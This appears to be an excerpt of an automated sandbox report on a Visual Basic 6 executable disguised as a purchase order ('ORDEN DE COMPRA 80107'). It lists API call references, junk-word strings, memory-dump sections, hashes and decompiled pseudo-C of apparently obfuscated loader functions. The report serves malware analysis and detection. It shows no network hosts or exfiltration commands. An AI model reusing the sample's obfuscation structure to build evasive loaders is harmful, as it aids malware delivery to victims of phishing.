0x00426a2e
0x00426a2f
0x00426a39
0x00426a46
0x00426a4e
0x00426a56
0x00426a5e
0x00426a62
0x00426a63
0x00426a65
0x00426a6a
0x00426a6a
0x00426a74
0x00426a91
0x00426a76
0x00426a76
0x00426a7b
0x00426a80
0x00426a85
0x00426a85
0x00426aab
0x00426ab5
0x00426ab9
0x00426abe
0x00426ac1
0x00426ac8
0x00426acf
0x00426ad6
0x00426add
0x00426ae4
0x00426aee
0x00426af8
0x00426af9
0x00426afa
0x00426afb
0x00426aff
0x00426b09
0x00426b0a
0x00426b0b
0x00426b0c
0x00426b10
0x00426b1a
0x00426b1b
0x00426b1c
0x00426b1d
0x00426b25
0x00426b30
0x00426b36
0x00426b38
0x00426b3f
0x00426b5e
0x00426b41
0x00426b41
0x00426b46
0x00426b4b
0x00426b4e
0x00426b51
0x00426b56
0x00426b56
0x00426b68
0x00426b6d
0x00426b6e
0x00426b9b
0x00426ba3
0x00426ba8

APIs

__vbaChkstk.MSVBVM60(?,00401336), ref: 0042682D
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,?,00401336), ref: 00426852
__vbaObjSet.MSVBVM60(?,00000000), ref: 0042688B
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,000001A8), ref: 004268BC
__vbaFreeObj.MSVBVM60(00000000,?,0040FAEC,000001A8), ref: 004268D3
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000), ref: 004268E3
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000), ref: 004268EC
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000), ref: 004268F6
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000), ref: 004268FE
__vbaChkstk.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000), ref: 0042691F
__vbaLateMemCallLd.MSVBVM60(?,?,FileExists,00000001,?,00000000,?,?,Scripting.FileSystemObject,00000000), ref: 0042693B
__vbaVarTstLe.MSVBVM60(?,00000000), ref: 00426948
__vbaFreeVar.MSVBVM60(?,00000000), ref: 00426954
__vbaStrCat.MSVBVM60(AIWAIN,?,?,00000000), ref: 0042696D
__vbaStrMove.MSVBVM60(AIWAIN,?,?,00000000), ref: 00426977
__vbaNew2.MSVBVM60(004101D4,0042A010,AIWAIN,?,?,00000000), ref: 0042698F
__vbaObjSet.MSVBVM60(?,00000000), ref: 004269C8
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAFC,000001A0), ref: 004269FD
#613.MSVBVM60(?,00000003), ref: 00426A26
__vbaStrVarMove.MSVBVM60(?,?,00000003), ref: 00426A2F
__vbaStrMove.MSVBVM60(?,?,00000003), ref: 00426A39
__vbaStrCopy.MSVBVM60(?,?,00000003), ref: 00426A46
__vbaFreeStr.MSVBVM60(?,?,00000003), ref: 00426A4E
__vbaFreeObj.MSVBVM60(?,?,00000003), ref: 00426A56
__vbaFreeVarList.MSVBVM60(00000002,00000003,?,?,?,00000003), ref: 00426A65
__vbaNew2.MSVBVM60(004101D4,0042A010,?,00000000), ref: 00426A80
__vbaObjSet.MSVBVM60(?,00000000), ref: 00426AB9
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426AEE
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426AFF
__vbaChkstk.MSVBVM60(?,00000000), ref: 00426B10
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FACC,000001B4,?,?,00000000), ref: 00426B51
__vbaFreeObj.MSVBVM60(?,?,00000000), ref: 00426B68
__vbaFreeStr.MSVBVM60(00426BA9,?,?,00000000), ref: 00426B9B
__vbaFreeObj.MSVBVM60(00426BA9,?,?,00000000), ref: 00426BA3

Strings

AIWAIN, xrefs: 00426968
FileExists, xrefs: 0042692F
Scripting.FileSystemObject, xrefs: 004268DA
understrygning, xrefs: 00426903

Memory Dump Source

Source File: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$Chkstk$CheckHresultMoveNew2$#613#716AddrefCallCopyLateList
String ID: AIWAIN$FileExists$Scripting.FileSystemObject$understrygning
API String ID: 1584821525-3694299366
Opcode ID: fa1245de2ed44f2709f0a7dee1d1815a493e2b3d7d820e49f532f9b6a8095705
Instruction ID: 042857b21eea8e36ee3270a6eb1290897904bc367dce32f1cc8e72fd1da4da5a
Opcode Fuzzy Hash: fa1245de2ed44f2709f0a7dee1d1815a493e2b3d7d820e49f532f9b6a8095705
Instruction Fuzzy Hash: 32A14970A00218AFDB20EFA1CC46FDDB7B5BF48304F60446EE506BB2A2DB7959458F59

Uniqueness

Uniqueness Score: -1.00%

Function 0041128D Relevance: 58.0, APIs: 31, Strings: 2, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E0041128D(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, signed int* _a20) {
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v28;
				void* _v32;
				char _v36;
				char _v40;
				short _v48;
				char _v56;
				char* _v64;
				intOrPtr _v72;
				void* _v76;
				intOrPtr* _v80;
				signed int _v84;
				void* _v88;
				signed int _v92;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr* _v112;
				signed int _v116;
				intOrPtr* _v120;
				signed int _v124;
				signed int _v128;
				char* _t107;
				signed int _t111;
				char* _t113;
				char* _t117;
				signed int _t121;
				char* _t123;
				signed int _t129;
				signed int _t134;
				void* _t175;
				intOrPtr _t176;

				_a4 = _a4 - 0xffff;
				_t176 = _t175 - 0xc;
				_push(0x401336);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t176;
				_push(0x68);
				L00401330();
				_v16 = _t176;
				_v12 = 0x401310;
				 *_a20 =  *_a20 & 0x00000000;
				if( *0x42a010 != 0) {
					_v104 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v104 = 0x42a010;
				}
				_t107 =  &_v40;
				L00401564();
				_v80 = _t107;
				_t111 =  *((intOrPtr*)( *_v80 + 0xf8))(_v80,  &_v36, _t107,  *((intOrPtr*)( *((intOrPtr*)( *_v104)) + 0x338))( *_v104));
				asm("fclex");
				_v84 = _t111;
				if(_v84 >= 0) {
					_v108 = _v108 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40fabc);
					_push(_v80);
					_push(_v84);
					L00401558();
					_v108 = _t111;
				}
				_push(_v36);
				L004014D4();
				_v88 =  ~(0 | _t111 - 0x00760591 >= 0x00000000);
				L00401516();
				L00401552();
				if(_v88 != 0) {
					if( *0x42a010 != 0) {
						_v112 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v112 = 0x42a010;
					}
					_t117 =  &_v40;
					L00401564();
					_v80 = _t117;
					_t121 =  *((intOrPtr*)( *_v80 + 0x1f0))(_v80,  &_v76, _t117,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x310))( *_v112));
					asm("fclex");
					_v84 = _t121;
					if(_v84 >= 0) {
						_v116 = _v116 & 0x00000000;
					} else {
						_push(0x1f0);
						_push(0x40f9cc);
						_push(_v80);
						_push(_v84);
						L00401558();
						_v116 = _t121;
					}
					_v48 = _v76;
					_v56 = 2;
					_t123 =  &_v56;
					_push(_t123);
					L004013CC();
					L00401588();
					_push(_t123);
					L004013D2();
					L00401588();
					L00401516();
					L00401552();
					L0040158E();
					if( *0x42a6c0 != 0) {
						_v120 = 0x42a6c0;
					} else {
						_push(0x42a6c0);
						_push(0x40fbb8);
						L0040155E();
						_v120 = 0x42a6c0;
					}
					_v80 =  *_v120;
					_t129 =  *((intOrPtr*)( *_v80 + 0x14))(_v80,  &_v40);
					asm("fclex");
					_v84 = _t129;
					if(_v84 >= 0) {
						_v124 = _v124 & 0x00000000;
					} else {
						_push(0x14);
						_push(0x40fba8);
						_push(_v80);
						_push(_v84);
						L00401558();
						_v124 = _t129;
					}
					_v88 = _v40;
					_t134 =  *((intOrPtr*)( *_v88 + 0x58))(_v88,  &_v36);
					asm("fclex");
					_v92 = _t134;
					if(_v92 >= 0) {
						_v128 = _v128 & 0x00000000;
					} else {
						_push(0x58);
						_push(0x40fdec);
						_push(_v88);
						_push(_v92);
						L00401558();
						_v128 = _t134;
					}
					L00401504();
					L00401516();
					L00401552();
				}
				_v64 = L"tikkendes";
				_v72 = 8;
				L0040151C();
				_push(0);
				_t113 =  &_v56;
				_push(_t113); // executed
				L004013C6(); // executed
				L00401588();
				L00401504();
				L00401516();
				L0040158E();
				L00401504();
				_push(0x428d7c);
				L00401516();
				return _t113;
			}

0x0041128d
0x00428a76
0x00428a79
0x00428a84
0x00428a85
0x00428a8c
0x00428a8f
0x00428a97
0x00428a9a
0x00428aa4
0x00428aae
0x00428ac8
0x00428ab0
0x00428ab0
0x00428ab5
0x00428aba
0x00428abf
0x00428abf
0x00428ae3
0x00428ae7
0x00428aec
0x00428afb
0x00428b01
0x00428b03
0x00428b0a
0x00428b26
0x00428b0c
0x00428b0c
0x00428b11
0x00428b16
0x00428b19
0x00428b1c
0x00428b21
0x00428b21
0x00428b2a
0x00428b2d
0x00428b3e
0x00428b45
0x00428b4d
0x00428b58
0x00428b65
0x00428b7f
0x00428b67
0x00428b67
0x00428b6c
0x00428b71
0x00428b76
0x00428b76
0x00428b9a
0x00428b9e
0x00428ba3
0x00428bb2
0x00428bb8
0x00428bba
0x00428bc1
0x00428bdd
0x00428bc3
0x00428bc3
0x00428bc8
0x00428bcd
0x00428bd0
0x00428bd3
0x00428bd8
0x00428bd8
0x00428be5
0x00428be9
0x00428bf0
0x00428bf3
0x00428bf4
0x00428bfe
0x00428c03
0x00428c04
0x00428c0e
0x00428c16
0x00428c1e
0x00428c26
0x00428c32
0x00428c4c
0x00428c34
0x00428c34
0x00428c39
0x00428c3e
0x00428c43
0x00428c43
0x00428c58
0x00428c67
0x00428c6a
0x00428c6c
0x00428c73
0x00428c8c
0x00428c75
0x00428c75
0x00428c77
0x00428c7c
0x00428c7f
0x00428c82
0x00428c87
0x00428c87
0x00428c93
0x00428ca2
0x00428ca5
0x00428ca7
0x00428cae
0x00428cc7
0x00428cb0
0x00428cb0
0x00428cb2
0x00428cb7
0x00428cba
0x00428cbd
0x00428cc2
0x00428cc2
0x00428cd4
0x00428cdc
0x00428ce4
0x00428ce4
0x00428ce9
0x00428cf0
0x00428cfd
0x00428d02
0x00428d04
0x00428d07
0x00428d08
0x00428d12
0x00428d1f
0x00428d27
0x00428d2f
0x00428d3c
0x00428d41
0x00428d76
0x00428d7b

APIs

__vbaChkstk.MSVBVM60(00000000,00401336), ref: 00428A8F
__vbaNew2.MSVBVM60(004101D4,0042A010,?,?,?,00000000,00401336), ref: 00428ABA
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428AE7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FABC,000000F8), ref: 00428B1C
__vbaLenBstr.MSVBVM60(?), ref: 00428B2D
__vbaFreeStr.MSVBVM60(?), ref: 00428B45
__vbaFreeObj.MSVBVM60(?), ref: 00428B4D
__vbaNew2.MSVBVM60(004101D4,0042A010,?), ref: 00428B71
__vbaObjSet.MSVBVM60(?,00000000), ref: 00428B9E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,000001F0), ref: 00428BD3
#651.MSVBVM60(00000002), ref: 00428BF4
__vbaStrMove.MSVBVM60(00000002), ref: 00428BFE
#527.MSVBVM60(00000000,00000002), ref: 00428C04
__vbaStrMove.MSVBVM60(00000000,00000002), ref: 00428C0E
__vbaFreeStr.MSVBVM60(00000000,00000002), ref: 00428C16
__vbaFreeObj.MSVBVM60(00000000,00000002), ref: 00428C1E
__vbaFreeVar.MSVBVM60(00000000,00000002), ref: 00428C26

Strings

tikkendes, xrefs: 00428CE9
idolisere, xrefs: 00428D34

Memory Dump Source

Source File: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresultMoveNew2$#527#651BstrChkstk
String ID: idolisere$tikkendes
API String ID: 1599149182-727755506
Opcode ID: 65d8982313a61c2e578ff8e09dd4413da48e6d242033f210c52adefa974209c6
Instruction ID: ae60bee82f292d99ccb89ec2fd7e8904dd99ac82dfa9ef1f94628021fd0175e5
Opcode Fuzzy Hash: 65d8982313a61c2e578ff8e09dd4413da48e6d242033f210c52adefa974209c6
Instruction Fuzzy Hash: 9281F771A01218AFCB14EFE5D846ADDBBB5BF48304F60443EE402BB2A1DB789945CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00411232 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 57%

			E00411232(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v28;
				signed int _v32;
				short _v36;
				char _v40;
				char _v44;
				char _v48;
				void* _v52;
				intOrPtr* _v56;
				signed int _v60;
				char _v64;
				void* _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr* _v100;
				signed int _v104;
				intOrPtr* _v108;
				signed int _v112;
				intOrPtr* _v116;
				signed int _v120;
				signed int _t151;
				signed int _t155;
				short _t156;
				signed int _t160;
				signed int _t163;
				signed int _t167;
				signed int _t171;
				signed int _t172;
				signed int _t180;
				signed int* _t186;
				signed int _t190;
				signed int* _t194;
				signed int _t198;
				short _t199;
				intOrPtr _t203;
				void* _t206;
				char* _t221;
				intOrPtr _t234;
				char* _t237;
				void* _t239;
				void* _t240;
				void* _t242;
				intOrPtr _t243;

				_t206 = __ebx;
				_a4 = _a4 - 0xffff;
				_t240 = _t242;
				_t243 = _t242 - 0xc;
				 *[fs:0x0] = _t243;
				L00401330();
				_v16 = _t243;
				_v12 = 0x4012a0;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x60,  *[fs:0x0], 0x401336, _t239);
				L00401504();
				_v88 = 0x1311;
				_v84 = 1;
				_v32 = _v32 & 0x00000000;
				while(_v32 <= _v88) {
					if( *0x42a010 != 0) {
						_v100 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v100 = 0x42a010;
					}
					_t160 =  &_v48;
					L00401564();
					_v72 = _t160;
					_t163 =  *((intOrPtr*)( *_v72 + 0x1ac))(_v72, _t160,  *((intOrPtr*)( *((intOrPtr*)( *_v100)) + 0x348))( *_v100));
					asm("fclex");
					_v76 = _t163;
					if(_v76 >= 0) {
						_v104 = _v104 & 0x00000000;
					} else {
						_push(0x1ac);
						_push(0x40faec);
						_push(_v72);
						_push(_v76);
						L00401558();
						_v104 = _t163;
					}
					L00401552();
					_v56 = 0x80020004;
					_v64 = 0xa;
					if( *0x42a010 != 0) {
						_v108 = 0x42a010;
					} else {
						_push(0x42a010);
						_push(0x4101d4);
						L0040155E();
						_v108 = 0x42a010;
					}
					_t167 =  &_v48;
					L00401564();
					_v72 = _t167;
					_t171 =  *((intOrPtr*)( *_v72 + 0x48))(_v72,  &_v40, _t167,  *((intOrPtr*)( *((intOrPtr*)( *_v108)) + 0x364))( *_v108));
					asm("fclex");
					_v76 = _t171;
					if(_v76 >= 0) {
						_v112 = _v112 & 0x00000000;
					} else {
						_push(0x48);
						_push(0x40fb2c);
						_push(_v72);
						_push(_v76);
						L00401558();
						_v112 = _t171;
					}
					_t172 = 0x10;
					L00401330();
					_t237 =  &_v64;
					_t234 = _t243;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_push(L"NONASBESTINE");
					_push(L"OVERASSESSMENT");
					_push(L"ansamlende"); // executed
					L00401408(); // executed
					L00401588();
					_push(_t172);
					_push(_v40);
					L00401432();
					asm("sbb eax, eax");
					_v80 =  ~( ~( ~_t172));
					_push( &_v40);
					_push( &_v44);
					_push(2);
					L004014E0();
					_t243 = _t243 + 0xc;
					_t221 =  &_v48;
					L00401552();
					if(_v80 != 0) {
						while( *((intOrPtr*)(_a4 + 0x64)) < 0xd8) {
							_t69 = _a4 + 0x64; // 0x428a36
							_t203 =  *_t69 + 1;
							if(_t203 < 0) {
								L31:
								L00401438();
								_push(_t240);
								_push(_t221);
								_push(_t221);
								_push(0x401336);
								_push( *[fs:0x0]);
								 *[fs:0x0] = _t243;
								_push(0x38);
								L00401330();
								_push(_t206);
								_push(_t237);
								_push(_t234);
								_v108 = _t243;
								_v104 = 0x4012b0;
								if( *0x42a010 != 0) {
									_v68 = 0x42a010;
								} else {
									_push(0x42a010);
									_push(0x4101d4);
									L0040155E();
									_v68 = 0x42a010;
								}
								_t186 =  &_v32;
								L00401564();
								_v56 = _t186;
								_v40 = 0x80020004;
								_v48 = 0xa;
								L00401330();
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t190 =  *((intOrPtr*)( *_v56 + 0x174))(_v56, 0x10, _t186,  *((intOrPtr*)( *((intOrPtr*)( *_v68)) + 0x31c))( *_v68));
								asm("fclex");
								_v60 = _t190;
								if(_v60 >= 0) {
									_v72 = _v72 & 0x00000000;
								} else {
									_push(0x174);
									_push(0x40fc94);
									_push(_v56);
									_push(_v60);
									L00401558();
									_v72 = _t190;
								}
								L00401552();
								if( *0x42a010 != 0) {
									_v76 = 0x42a010;
								} else {
									_push(0x42a010);
									_push(0x4101d4);
									L0040155E();
									_v76 = 0x42a010;
								}
								_t194 =  &_v32;
								L00401564();
								_v56 = _t194;
								_t198 =  *((intOrPtr*)( *_v56 + 0x1a0))(_v56,  &_v52, _t194,  *((intOrPtr*)( *((intOrPtr*)( *_v76)) + 0x320))( *_v76));
								asm("fclex");
								_v60 = _t198;
								if(_v60 >= 0) {
									_v80 = _v80 & 0x00000000;
								} else {
									_push(0x1a0);
									_push(0x40fabc);
									_push(_v56);
									_push(_v60);
									L00401558();
									_v80 = _t198;
								}
								_t199 = _v52;
								_v28 = _t199;
								L00401552();
								_push(0x427ea1);
								return _t199;
							}
							 *((intOrPtr*)(_a4 + 0x64)) = _t203;
							_t73 = _a4 + 0x60; // 0x80007
							_t221 = _a4;
							 *((intOrPtr*)(_t221 + 0x60)) =  *_t73;
						}
						_push(L"Fumlende3");
						_push(L"INTERBREEDS");
						_push(L"Genoptrykkenes4");
						_push(L"Cavernlike6"); // executed
						L00401402(); // executed
					}
					_t180 = _v32 + _v84;
					if(_t180 < 0) {
						goto L31;
					} else {
						_v32 = _t180;
						continue;
					}
					break;
				}
				if( *0x42a010 != 0) {
					_v116 = 0x42a010;
				} else {
					_push(0x42a010);
					_push(0x4101d4);
					L0040155E();
					_v116 = 0x42a010;
				}
				_t151 =  &_v48;
				L00401564();
				_v72 = _t151;
				_t155 =  *((intOrPtr*)( *_v72 + 0x108))(_v72,  &_v68, _t151,  *((intOrPtr*)( *((intOrPtr*)( *_v116)) + 0x330))( *_v116));
				asm("fclex");
				_v76 = _t155;
				if(_v76 >= 0) {
					_v120 = _v120 & 0x00000000;
				} else {
					_push(0x108);
					_push(0x40f9cc);
					_push(_v72);
					_push(_v76);
					L00401558();
					_v120 = _t155;
				}
				_t156 = _v68;
				_v36 = _t156;
				L00401552();
				_push(0x427cfc);
				L00401516();
				return _t156;
			}

0x00411232
0x00411232
0x00427a00
0x00427a02
0x00427a11
0x00427a1b
0x00427a23
0x00427a26
0x00427a2d
0x00427a3c
0x00427a45
0x00427a4a
0x00427a51
0x00427a58
0x00427a6d
0x00427a80
0x00427a9a
0x00427a82
0x00427a82
0x00427a87
0x00427a8c
0x00427a91
0x00427a91
0x00427ab5
0x00427ab9
0x00427abe
0x00427ac9
0x00427acf
0x00427ad1
0x00427ad8
0x00427af4
0x00427ada
0x00427ada
0x00427adf
0x00427ae4
0x00427ae7
0x00427aea
0x00427aef
0x00427aef
0x00427afb
0x00427b00
0x00427b07
0x00427b15
0x00427b2f
0x00427b17
0x00427b17
0x00427b1c
0x00427b21
0x00427b26
0x00427b26
0x00427b4a
0x00427b4e
0x00427b53
0x00427b62
0x00427b65
0x00427b67
0x00427b6e
0x00427b87
0x00427b70
0x00427b70
0x00427b72
0x00427b77
0x00427b7a
0x00427b7d
0x00427b82
0x00427b82
0x00427b8d
0x00427b8e
0x00427b93
0x00427b96
0x00427b98
0x00427b99
0x00427b9a
0x00427b9b
0x00427b9c
0x00427ba1
0x00427ba6
0x00427bab
0x00427bb5
0x00427bba
0x00427bbb
0x00427bbe
0x00427bc5
0x00427bcb
0x00427bd2
0x00427bd6
0x00427bd7
0x00427bd9
0x00427bde
0x00427be1
0x00427be4
0x00427bef
0x00427bf1
0x00427c00
0x00427c03
0x00427c06
0x00427d25
0x00427d25
0x00427d2a
0x00427d2d
0x00427d2e
0x00427d2f
0x00427d3a
0x00427d3b
0x00427d42
0x00427d45
0x00427d4a
0x00427d4b
0x00427d4c
0x00427d4d
0x00427d50
0x00427d5e
0x00427d78
0x00427d60
0x00427d60
0x00427d65
0x00427d6a
0x00427d6f
0x00427d6f
0x00427d93
0x00427d97
0x00427d9c
0x00427d9f
0x00427da6
0x00427db0
0x00427dba
0x00427dbb
0x00427dbc
0x00427dbd
0x00427dc6
0x00427dcc
0x00427dce
0x00427dd5
0x00427df1
0x00427dd7
0x00427dd7
0x00427ddc
0x00427de1
0x00427de4
0x00427de7
0x00427dec
0x00427dec
0x00427df8
0x00427e04
0x00427e1e
0x00427e06
0x00427e06
0x00427e0b
0x00427e10
0x00427e15
0x00427e15
0x00427e39
0x00427e3d
0x00427e42
0x00427e51
0x00427e57
0x00427e59
0x00427e60
0x00427e7c
0x00427e62
0x00427e62
0x00427e67
0x00427e6c
0x00427e6f
0x00427e72
0x00427e77
0x00427e77
0x00427e80
0x00427e84
0x00427e8b
0x00427e90
0x00000000
0x00427e90
0x00427c0f
0x00427c15
0x00427c18
0x00427c1b
0x00427c1b
0x00427c20
0x00427c25
0x00427c2a
0x00427c2f
0x00427c34
0x00427c34
0x00427a61
0x00427a64
0x00000000
0x00427a6a
0x00427a6a
0x00000000
0x00427a6a
0x00000000
0x00427a64
0x00427c45
0x00427c5f
0x00427c47
0x00427c47
0x00427c4c
0x00427c51
0x00427c56
0x00427c56
0x00427c7a
0x00427c7e
0x00427c83
0x00427c92
0x00427c98
0x00427c9a
0x00427ca1
0x00427cbd
0x00427ca3
0x00427ca3
0x00427ca8
0x00427cad
0x00427cb0
0x00427cb3
0x00427cb8
0x00427cb8
0x00427cc1
0x00427cc5
0x00427ccc
0x00427cd1
0x00427cf6
0x00427cfb

APIs

__vbaChkstk.MSVBVM60(00000000,00401336), ref: 00427A1B
__vbaStrCopy.MSVBVM60(?,?,?,00000000,00401336), ref: 00427A45
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00427A8C
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427AB9
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FAEC,000001AC), ref: 00427AEA
__vbaFreeObj.MSVBVM60(00000000,?,0040FAEC,000001AC), ref: 00427AFB
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00427B21
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427B4E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040FB2C,00000048), ref: 00427B7D
__vbaChkstk.MSVBVM60(00000000,?,0040FB2C,00000048), ref: 00427B8E
#689.MSVBVM60(ansamlende,OVERASSESSMENT,NONASBESTINE), ref: 00427BAB
__vbaStrMove.MSVBVM60(ansamlende,OVERASSESSMENT,NONASBESTINE), ref: 00427BB5
__vbaStrCmp.MSVBVM60(?,00000000,ansamlende,OVERASSESSMENT,NONASBESTINE), ref: 00427BBE
__vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000,ansamlende,OVERASSESSMENT,NONASBESTINE), ref: 00427BD9
__vbaNew2.MSVBVM60(004101D4,0042A010), ref: 00427C51
__vbaObjSet.MSVBVM60(?,00000000), ref: 00427C7E
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040F9CC,00000108), ref: 00427CB3
__vbaFreeObj.MSVBVM60(00000000,?,0040F9CC,00000108), ref: 00427CCC
__vbaFreeStr.MSVBVM60(00427CFC), ref: 00427CF6

Strings

ansamlende, xrefs: 00427BA6
OVERASSESSMENT, xrefs: 00427BA1
NONASBESTINE, xrefs: 00427B9C

Memory Dump Source

Source File: 00000000.00000002.366777936.000000000040D000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.366760413.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366764718.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366771153.0000000000406000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366782993.0000000000413000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366793825.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366797544.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.366803272.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ORDEN DE COMPRA 80107.jbxd

Yara matches

Similarity

API ID: __vba$Free$CheckHresultNew2$Chkstk$#689CopyListMove
String ID: NONASBESTINE$OVERASSESSMENT$ansamlende
API String ID: 3659783703-2498199696
Opcode ID: b86de312414956192b5c8e6e3d6b2b78167eb9c474417d22780c92c22e71dd50
Instruction ID: 59e8cafdd60790e39ba810874c52fcaf728857359ec88505ba32c6137c15e17a
Opcode Fuzzy Hash: b86de312414956192b5c8e6e3d6b2b78167eb9c474417d22780c92c22e71dd50
Instruction Fuzzy Hash: D6513E70A40218EFCB10DFA5D845FDDBBB5BF09704F60402AF406BB2A1C779A946CB59

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040192D Relevance: .2, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E0040192D() {
				signed int _t1;
				signed int _t7;
				signed int _t16;
				signed int _t24;
				signed char _t30;
				signed char _t31;
				intOrPtr* _t34;
				void* _t35;

				asm("movsb");
				_t7 = _t1 ^ 0xe8e1c0;
				_pop(ss);
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				 *_t7 =  *_t7 + _t7;
				asm("cdq");
